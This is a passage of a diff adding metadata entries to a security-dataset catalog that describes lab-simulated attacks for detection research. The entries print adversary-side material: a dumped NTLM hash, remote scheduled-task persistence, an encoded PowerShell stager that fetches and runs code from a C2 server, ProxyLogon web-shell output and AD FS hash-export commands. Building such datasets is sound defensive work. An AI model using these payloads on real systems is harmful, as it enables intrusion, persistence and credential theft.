BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Start-EtwTrace.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\\SimpleInjection.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection\\SimpleInjection.zip\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2\\SimpleInjection\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\SimpleInjection 2.zip\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Set-AuditRule.ps1\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\Security.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\raccine_simulation_mode_2020-10-18T05154752.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\raccine_2020-10-18T04185015.json\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.yara\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\potential_process_herpaderping.txt\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Desktop\\Dumpert-master\\Dumpert-master\\Dumpert\\Outflank-Dumpert.sln\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out8.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out7.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out6.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out5.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out3.evtx\n  Explorer  BUILTIN\\Administrators  2020-10-28  C:\\Users\\wardog\\Documents\\out4.evtx\n====== ExplorerRunCommands ======\n\n====== FileZilla ======\n\n====== FirefoxPresence ======\n\n====== IdleTime ======\n\n  CurrentUser : WORKSTATION5\\wardog\n  Idletime    : 00h:00m:00s:015ms (15 milliseconds)\n\n====== IEFavorites ======\n\nFavorites (wardog):\n\n  http://go.microsoft.com/fwlink/p/?LinkId=255142\n\n====== IETabs ======\n\n====== IEUrls ======\n\nInternet Explorer typed URLs for the last 7 days\n\n====== MappedDrives ======\n\nMapped Drives (via WMI)\n\n====== MTPuTTY ======\n\n====== OfficeMRUs ======\n\nEnumerating Office most recently used files for the last 7 days\n\n  App       User                     LastAccess    FileName\n  ---       ----                     ----------    --------\n====== PowerShellHistory ======\n\n====== PuttyHostKeys ======\n\n====== PuttySessions ======\n\n====== RDCManFiles ======\n\n====== RDPSavedConnections ======\n\n====== SecPackageCreds ======\n\n  Version                        : NetNTLMv1\n  Hash                           : wardog::WORKSTATION5:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:99c43e8b88a02e13bae1b088a24d3a90aa64487f8da1e2fd:1122334455667788\n\n====== SlackDownloads ======\n\n====== SlackPresence ======\n\n====== SlackWorkspaces ======\n\n====== SuperPutty ======\n\n====== TokenGroups ======\n\nCurrent Token's Groups\n\n  WORKSTATION5\\None                        S-1-5-21-3940915590-64593676-1414006259-513\n  Everyone                                 S-1-1-0\n  NT AUTHORITY\\Local account and member of Administrators group S-1-5-114\n  BUILTIN\\Administrators                   S-1-5-32-544\n  BUILTIN\\Performance Log Users            S-1-5-32-559\n  BUILTIN\\Users                            S-1-5-32-545\n  BUILTIN\\Remote Desktop Users             S-1-5-32-555\n  NT AUTHORITY\\REMOTE INTERACTIVE LOGON    S-1-5-14\n  NT AUTHORITY\\INTERACTIVE                 S-1-5-4\n  NT AUTHORITY\\Authenticated Users         S-1-5-11\n  NT AUTHORITY\\This Organization           S-1-5-15\n  NT AUTHORITY\\Local account               S-1-5-113\n  LOCAL                                    S-1-2-0\n  NT AUTHORITY\\NTLM Authentication         S-1-5-64-10\n====== WindowsCredentialFiles ======\n\n  Folder : C:\\windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Credentials\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : 4e3bccc6-a1eb-4076-b723-6456d3dec626\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\Users\\wardog\\AppData\\Local\\Microsoft\\Credentials\\\n\n    FileName     : DFBE70A7E5CC19A398EBF1B96859CE5D\n    Description  : Local Credential Data\n    MasterKey    : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 11184\n\n\n  Folder : C:\\Users\\wardog\\AppData\\Roaming\\Microsoft\\Credentials\\\n\n    FileName     : 38924BBFD1C490D90FFE70EECB3A3739\n    Description  : Enterprise Credential Data\n    MasterKey    : ad27dbc8-def4-4b0d-bfbd-89b429dfe9fe\n    Accessed     : 11/2/2020 4:39:13 PM\n    Modified     : 11/2/2020 4:39:13 PM\n    Size         : 474\n\n\n====== WindowsVault ======\n\n\n  Vault GUID     : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\n  Vault Type     : Web Credentials\n  Item count     : 1\n      SchemaGuid   : 3ccd5499-87a8-4b10-a215-608888dd3b55\n      Resource     : String: http://ossemproject.com\n      Identity     : String: pgustavo\n      PackageSid   : (null)\n      Credential   : String: [placeholder]\n      LastModified : 10/28/2020 11:18:10 PM\n\n  Vault GUID     : 77bc582b-f0a6-4e15-4e80-61736b6f3b29\n  Vault Type     : Windows Credentials\n  Item count     : 1\n      SchemaGuid   : 3e0e35be-1b77-43e7-b873-aed901b6275b\n      Resource     : String: Domain:target=threathunterplaybook.com\n      Identity     : String: wardog\n      PackageSid   : (null)\n      Credential   :\n      LastModified : 10/28/2020 11:13:44 PM\n\n\n[*] Completed collection in 1.834 seconds\n\nC:\\Users\\wardog\\Desktop> "
+        },
+        "references": [
+            "https://docs.microsoft.com/en-us/dotnet/api/system.net.httplistener?view=netcore-3.1"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:01.227137+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201219070027.yaml": {
+        "title": "Remote Scheduled Task Creation",
+        "id": "SDWIN-201219070027",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/12/19",
+        "modification_date": "2020/12/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor creating a scheduled task remotely using schtasks.",
+        "attack_mappings": [
+            {
+                "technique": "T1053",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0002",
+                    "TA0003",
+                    "TA0004",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_create.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_create.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "Cmd",
+                    "module": "Cmd",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "PS C:\\windows\\system32> C:\\Windows\\system32\\cmd.exe /C schtasks /create /F /tn \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" /tr \"C:\\Windows\\system32\\cmd.exe /C C:\\Windows\\System32\\notepad.exe\" /sc ONSTART /ru system /S WORKSTATION6\nSUCCESS: The scheduled task \"\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\" has successfully been created.\nPS C:\\windows\\system32> "
+        },
+        "references": [
+            "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:04.836104+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-201219075059.yaml": {
+        "title": "Remote Scheduled Task Modification",
+        "id": "SDWIN-201219075059",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/12/19",
+        "modification_date": "2020/12/19",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor modifying a scheduled task remotely.",
+        "attack_mappings": [
+            {
+                "technique": "T1053",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0002",
+                    "TA0003",
+                    "TA0004",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/schtask_modification.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/schtask_modification.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "PowerShell",
+                    "module": "PowerShell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "Name               : EventCacheManager\nPath               : \\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager\nState              : 3\nEnabled            : True\nLastRunTime        : 11/30/1999 12:00:00 AM\nLastTaskResult     : 267011\nNumberOfMissedRuns : 0\nNextRunTime        : 12/30/1899 12:00:00 AM\nDefinition         : System.__ComObject\nXml                : <?xml version=\"1.0\" encoding=\"UTF-16\"?>\n                    <Task version=\"1.2\"\n                    xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\n                      <RegistrationInfo>\n                        <Date>2020-12-19T07:00:22</Date>\n                        <Author>THESHIRE\\pgustavo</Author>\n                        <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager</URI>\n                      </RegistrationInfo>\n                      <Principals>\n                        <Principal id=\"Author\">\n                          <UserId>S-1-5-18</UserId>\n                        </Principal>\n                      </Principals>\n                      <Settings>\n                        <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\n                        <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\n                        <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n                        <IdleSettings>\n                          <Duration>PT10M</Duration>\n                          <WaitTimeout>PT1H</WaitTimeout>\n                          <StopOnIdleEnd>true</StopOnIdleEnd>\n                          <RestartOnIdle>false</RestartOnIdle>\n                        </IdleSettings>\n                      </Settings>\n                      <Triggers>\n                        <BootTrigger>\n                          <StartBoundary>2020-12-19T07:00:00</StartBoundary>\n                        </BootTrigger>\n                      </Triggers>\n                      <Actions Context=\"Author\">\n                        <Exec>\n                          <Command>powershell</Command>\n                          <Arguments>-noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAGEA\n                    QgBsAEUALgBQAFMAVgBFAFIAUwBJAG8ATgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABDAD\n                    MAMgAyAD0AWwBSAEUARgBdAC4AQQBzAFMAZQBNAEIAbABZAC4ARwBFAHQAVAB5AFAAZQAoACcAUwB5\n                    AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFUAdA\n                    BpAGwAcwAnACkALgAiAEcARQB0AEYASQBlAGAAbABEACIAKAAnAGMAYQBjAGgAZQBkAEcAcgBvAHUA\n                    cABQAG8AbABpAGMAeQBTAGUAdAB0AGkAbgBnAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAG\n                    MALABTAHQAYQB0AGkAYwAnACkAOwBJAEYAKAAkAGMAMwAyADIAKQB7ACQAYwA3ADQAMgA9ACQAYwAz\n                    ADIAMgAuAEcAZQBUAFYAYQBsAFUAZQAoACQAbgBVAGwAbAApADsASQBGACgAJABDADcANAAyAFsAJw\n                    BTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQAYwA3ADQA\n                    MgBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG\n                    4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAw\n                    ADsAJABDADcANAAyAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZw\n                    AnAF0AWwAnAEUAbgBhAGIAbABlAFMAYwByAGkAcAB0AEIAbABvAGMAawBJAG4AdgBvAGMAYQB0AGkA\n                    bwBuAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAB9ACQAVgBBAEwAPQBbAEMAbwBsAGwARQBjAHQASQBvAG\n                    4AUwAuAEcAZQBuAGUAUgBpAGMALgBEAEkAYwB0AGkATwBOAGEAUgBZAFsAcwBUAHIAaQBuAGcALABT\n                    AFkAcwBUAEUAbQAuAE8AYgBKAGUAYwB0AF0AXQA6ADoAbgBFAHcAKAApADsAJAB2AEEATAAuAEEARA\n                    BEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4A\n                    ZwAnACwAMAApADsAJABWAGEATAAuAEEARABEACgAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAG\n                    wAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcALAAwACkAOwAkAEMANwA0\n                    ADIAWwAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcg\n                    BlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwA\n                    UABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAG\n                    kAbgBnACcAXQA9ACQAdgBBAGwAfQBFAEwAUwBlAHsAWwBTAEMAcgBpAHAAVABCAGwATwBDAGsAXQAu\n                    ACIARwBFAFQARgBJAGUAYABMAGQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKw\n                    AnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBMAHUARQAoACQA\n                    bgB1AGwAbAAsACgATgBFAFcALQBPAGIASgBFAEMAVAAgAEMAbwBMAGwAZQBDAFQASQBvAE4AcwAuAE\n                    cARQBuAGUAUgBJAEMALgBIAGEAcwBoAFMAZQB0AFsAcwBUAHIAaQBOAEcAXQApACkAfQAkAFIAZQBG\n                    AD0AWwBSAGUARgBdAC4AQQBzAFMAZQBtAGIAbABZAC4ARwBlAHQAVABZAFAAZQAoACcAUwB5AHMAdA\n                    BlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkA\n                    JwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBlAGYALgBHAGUAdABGAGkARQBMAGQAKAAnAGEAbQBzAG\n                    kASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABh\n                    AHQAaQBjACcAKQAuAFMARQB0AFYAYQBMAFUAZQAoACQATgBVAEwATAAsACQAVABSAFUARQApADsAfQ\n                    A7AFsAUwBZAFMAVABFAE0ALgBOAGUAdAAuAFMAZQBSAFYASQBDAGUAUABPAEkAbgB0AE0AYQBOAGEA\n                    RwBFAFIAXQA6ADoARQBYAFAAZQBjAFQAMQAwADAAQwBPAE4AdABpAE4AdQBFAD0AMAA7ACQANQA3AD\n                    kAMwA9AE4ARQB3AC0ATwBiAEoAZQBjAFQAIABTAHkAcwBUAGUATQAuAE4ARQBUAC4AVwBFAEIAQwBM\n                    AGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcw\n                    AgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAA\n                    cgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAF\n                    QARQB4AFQALgBFAG4AYwBPAGQAaQBuAGcAXQA6ADoAVQBuAEkAQwBPAEQARQAuAEcARQB0AFMAdABS\n                    AGkAbgBHACgAWwBDAG8AbgBWAGUAcgB0AF0AOgA6AEYAcgBPAE0AQgBhAHMARQA2ADQAUwB0AHIASQ\n                    BOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAEwA\n                    ZwBBAHgAQQBEAEEAQQBMAGcAQQB4AEEARABBAEEATABnAEEAMQBBAEEAPQA9ACcAKQApACkAOwAkAH\n                    QAPQAnAC8AbABvAGcAaQBuAC8AcAByAG8AYwBlAHMAcwAuAHAAaABwACcAOwAkADUANwA5ADMALgBI\n                    AGUAYQBkAGUAcgBTAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJA\n                    A1ADcAOQAzAC4AUAByAE8AWAB5AD0AWwBTAHkAcwB0AGUATQAuAE4ARQBUAC4AVwBFAGIAUgBlAHEA\n                    VQBFAFMAdABdADoAOgBEAEUARgBhAHUAbAB0AFcARQBiAFAAUgBPAFgAeQA7ACQANQA3ADkAMwAuAF\n                    AAcgBvAFgAWQAuAEMAUgBlAEQARQBuAFQAaQBBAGwAcwAgAD0AIABbAFMAWQBTAHQARQBNAC4ATgBF\n                    AFQALgBDAHIARQBkAEUATgBUAGkAQQBMAEMAYQBjAEgARQBdADoAOgBEAEUAZgBhAFUAbABUAE4AZQ\n                    BUAHcAbwBSAGsAQwByAEUAZABFAE4AdABJAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgA\n                    eQAgAD0AIAAkADUANwA5ADMALgBQAHIAbwB4AHkAOwAkAEsAPQBbAFMAWQBTAHQAZQBtAC4AVABFAH\n                    gAVAAuAEUATgBjAE8AZABJAE4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAVABCAFkAdABlAFMAKAAn\n                    ACMANgBGACsAPgBFADgAMgA3AEgAVgBKAEcARAB0AG0AOQB9AFQAQAAqADEAaQB4AD0AXwBkAG4ASQ\n                    A0AFAAZQAnACkAOwAkAFIAPQB7ACQARAAsACQASwA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIA\n                    NQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQASwBbAC\n                    QAXwAlACQASwAuAEMAbwB1AE4AVABdACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABK\n                    AF0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQAfAAlAHsAJABJAD0AKAAkAEkAKw\n                    AxACkAJQAyADUANgA7ACQASAA9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABTAFsA\n                    JABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdACwAJABTAFsAJABJAF0AOwAkAF8ALQBiAH\n                    gATwByACQAUwBbACgAJABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQB9AH0AOwAk\n                    ADUANwA5ADMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAFcAVQ\n                    BFAGgAaABKAGMAQQBxAEQAbwA9AE4AVgByAE8AYwBsAEQAYQBmAG0AcQBOADAAdABBAEcAMgBGACsA\n                    TQAvAEwAagBFAHgAdgA4AD0AIgApADsAJABkAGEAVABhAD0AJAA1ADcAOQAzAC4ARABvAHcATgBMAE\n                    8AYQBkAEQAQQBUAEEAKAAkAFMAZQBSACsAJABUACkAOwAkAEkAVgA9ACQARABhAHQAYQBbADAALgAu\n                    ADMAXQA7ACQARABhAHQAYQA9ACQAZABBAHQAYQBbADQALgAuACQAZABhAFQAQQAuAEwAZQBOAGcAVA\n                    BIAF0AOwAtAGoAbwBJAE4AWwBDAEgAYQByAFsAXQBdACgAJgAgACQAUgAgACQARABhAHQAQQAgACgA\n                    JABJAFYAKwAkAEsAKQApAHwASQBFAFgA</Arguments>\n                        </Exec>\n                      </Actions>\n                    </Task>"
+        },
+        "references": [
+            "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
+            "https://github.com/OTRF/Blacksmith/blob/master/resources/scripts/powershell/misc/Update-RemoteTask.ps1"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:05.763202+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-210314014019.yaml": {
+        "title": "Exchange ProxyLogon SSRF RCE Vuln POC",
+        "id": "SDWIN-210314014019",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2021/03/14",
+        "modification_date": "2021/03/14",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents the execution of a public POC to abuse Exchange vulnerabilities (CVE-2021-26855 server-side request forgery (SSRF) vulnerability)",
+        "attack_mappings": [
+            {
+                "technique": "T1505",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0003",
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/proxylogon_ssrf_rce_poc.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Manual",
+                    "name": "cmd",
+                    "module": "cmd",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "C:\\Users\\wardog.MXS01\\Documents>\nC:\\Users\\wardog.MXS01\\Documents>python public-poc.py localhost wardog@azsentinel.local\nAttacking target localhost\n=============================\nGot DN: /o=azsentinel/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=6beef80bd6d14a68b9ae39df7f27a8cc-wardog\nGot SID: S-1-5-21-594047938-393122191-2580508586-500\nGot session id: e243cd06-1093-40d4-829c-63f3b9caea9b\nGot canary: pYoEXlKOqkGQMt3Dv3qJUExebVlG6NgI3c_XeQNd-VRV8lo6E5zskoLPJB0uOOGITLTC08eVUkk.\nGot OAB id: becafe73-b0c1-4f36-8df4-85f682840ef4\nReady!\n\nTesting command:\n===============\nPOST  shell:https://localhost/owa/auth/ohyeah.aspx\ncode\":\"Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"cmd /c whoami\").StdOut.ReadAll());\n\n\n[*] Waiting for ohyeah.aspx to be available..\n[*] Waiting for ohyeah.aspx to be available..\n\nResults:\n========\nnt authority\\system\n\n\nC:\\Users\\wardog.MXS01\\Documents>"
+        },
+        "references": [
+            "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+            "https://twitter.com/jack_halon/status/1370192318377168897",
+            "https://github.com/OTRF/Azure-Sentinel2Go/tree/master/grocery-list/Win10-AD-MXS"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:05.957195+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-210427020247.yaml": {
+        "title": "Export ADFS Database Configuration Remotely",
+        "id": "SDWIN-210427020247",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2021/04/27",
+        "modification_date": "2021/04/27",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset represents a threat actor exporting the AD FS database configuration remotely over http.",
+        "attack_mappings": [
+            {
+                "technique": "T0000",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/aadinternals_export_adfsdatabaseconfig_remotely.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "PowerShell Module",
+                    "name": "AADInternals",
+                    "module": "Export-AADIntADFSConfiguration",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Domain Admin",
+                "AD FS"
+            ],
+            "adversary_view": "# ADFS Service Account\n$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'\n# Domain Admin credentials\n$credentials = get-credential\n# Get Hash via AD replication\n$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex\n# Retrieve AD FS database configuration over HTTP\n$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:50:06.166194+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-210611210814.yaml": {
+        "title": "APT Simulator Cobalt Strike",
+        "id": "SDWIN-210611210814",
+        "contributors": [
+            "Jose Rodriguez @Cyb3rPandaH"
+        ],
+        "creation_date": "2021/06/11",
+        "modification_date": "2021/06/11",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": null,
+        "description": "This dataset was created after running the Cobalt Strike module from the APT Simulator tool (https://github.com/NextronSystems/APTSimulator).",
+        "attack_mappings": [
+            {
+                "technique": "T1134",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            },
+            {
+                "technique": "T1134",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/other/aptsimulator_cobaltstrike.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Lab VM",
+            "tools": [
+                {
+                    "type": "Batch Script",
+                    "name": "APT Simulator",
+                    "module": "Cobalt Strike",
+                    "script": "https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/cobaltstrike/cobaltstrike-simulation.bat"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "===========================================================================\n    ___    ____  ___________ _                 __      __\n  /   |  / __ \\/_  __/ ___/(_)___ ___  __  __/ /___ _/ /_____  _____\n  / /| | / /_/ / / /  \\__ \\/ / __ `__ \\/ / / / / __ `/ __/ __ \\/ ___/\n/ ___ |/ ____/ / /  ___/ / / / / / / / /_/ / / /_/ / /_/ /_/ / /\n/_/  |_/_/     /_/  /____/_/_/ /_/ /_/\\__,_/_/\\__,_/\\__/\\____/_/\n\nFlorian Roth, Nextron Systems, v0.9.1, June 2021\n\nSelect the test-set that you want to run:\n\n[0] RUN EVERY TEST\n[1] Collection\n[2] Command and Control\n[3] Credential Access\n[4] Defense Evasion\n[5] Discovery\n[6] Execution\n[7] Lateral Movement\n[8] Persistence\n[9] Privilege Escalation\n\n[C] CobaltStrike Beacon Simulation\n\n[A] Apply AV Exclusions in Registry\n[S] Settings\n[E] Exit\n\nYour selection (then press ENTER): C\n===========================================================================\nSimulate CobaltStrike Beacon Activity\n\n--- Create some default Named Pipes ...\nCreating Named Pipe number 1: MSSE-1337-server\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 1\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 4748 has been terminated.\nCreating Named 